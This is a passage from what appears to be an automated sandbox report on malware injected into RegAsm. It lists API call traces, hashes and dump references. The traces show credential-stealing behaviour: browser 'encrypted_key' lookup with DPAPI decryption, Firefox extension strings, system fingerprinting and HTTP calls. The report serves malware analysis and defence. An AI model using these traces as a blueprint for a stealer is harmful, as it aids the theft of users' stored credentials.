                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                        • API String ID: 161838763-3310892237
                                                                                                                                                        • Opcode ID: b197b254bea5739d4ea869b48736c3ce1b48c889f9835ba7089c06bdc5d1a73a
                                                                                                                                                        • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                                                        • Opcode Fuzzy Hash: b197b254bea5739d4ea869b48736c3ce1b48c889f9835ba7089c06bdc5d1a73a
                                                                                                                                                        • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                                                        Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                                                          • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                                                          • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                                                          • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                          • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                          • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                        • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                        • API String ID: 2311102621-738592651
                                                                                                                                                        • Opcode ID: 9a1114d730fe2c3c941bb5a1ee01973737c927cbb7a233f91aa18f79db7335ce
                                                                                                                                                        • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                                                                        • Opcode Fuzzy Hash: 9a1114d730fe2c3c941bb5a1ee01973737c927cbb7a233f91aa18f79db7335ce
                                                                                                                                                        • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                                                                        Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3676486918-0
                                                                                                                                                        • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                                                        • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                                                                                        • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                                                        • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                                                                                        Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                        • String ID: nzA
                                                                                                                                                        • API String ID: 153043497-1761861442
                                                                                                                                                        • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                                                        • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                                                                        • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                                                        • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                                                                        Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                          • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                          • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                          • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                          • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                          • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                          • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                        • String ID: ERROR$ERROR
                                                                                                                                                        • API String ID: 3086566538-2579291623
                                                                                                                                                        • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                                                        • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                                                                                        • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                                                        • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                                                                                        Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4198075804-0
                                                                                                                                                        • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                                                        • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                                                                        • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                                                        • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                                                                        Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1065093856-0
                                                                                                                                                        • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                                                        • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                                                                        • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                                                        • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                                                                        Function 6C603060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C603095
                                                                                                                                                          • Part of subcall function 6C6035A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C68F688,00001000), ref: 6C6035D5
                                                                                                                                                          • Part of subcall function 6C6035A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6035E0
                                                                                                                                                          • Part of subcall function 6C6035A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6035FD
                                                                                                                                                          • Part of subcall function 6C6035A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C60363F
                                                                                                                                                          • Part of subcall function 6C6035A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C60369F
                                                                                                                                                          • Part of subcall function 6C6035A0: __aulldiv.LIBCMT ref: 6C6036E4
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C60309F
                                                                                                                                                          • Part of subcall function 6C625B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6256EE,?,00000001), ref: 6C625B85
                                                                                                                                                          • Part of subcall function 6C625B50: EnterCriticalSection.KERNEL32(6C68F688,?,?,?,6C6256EE,?,00000001), ref: 6C625B90
                                                                                                                                                          • Part of subcall function 6C625B50: LeaveCriticalSection.KERNEL32(6C68F688,?,?,?,6C6256EE,?,00000001), ref: 6C625BD8
                                                                                                                                                          • Part of subcall function 6C625B50: GetTickCount64.KERNEL32 ref: 6C625BE4
                                                                                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6030BE
                                                                                                                                                          • Part of subcall function 6C6030F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C603127
                                                                                                                                                          • Part of subcall function 6C6030F0: __aulldiv.LIBCMT ref: 6C603140
                                                                                                                                                          • Part of subcall function 6C63AB2A: __onexit.LIBCMT ref: 6C63AB30
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4291168024-0
                                                                                                                                                        • Opcode ID: b595c3ccfb4ba0aaf34963f850444795abee491ee09bf5fdd5e2359539e4fe0f
                                                                                                                                                        • Instruction ID: ae3690956772e0b18be03e0fce8f16d9cbc72d904bf80732efc27e4d87a178fa
                                                                                                                                                        • Opcode Fuzzy Hash: b595c3ccfb4ba0aaf34963f850444795abee491ee09bf5fdd5e2359539e4fe0f
                                                                                                                                                        • Instruction Fuzzy Hash: F2F02D12E21B44B7CB10DF7588D15E67370AF6B214F102729E84967561FB2061D883EF
                                                                                                                                                        Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                        • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
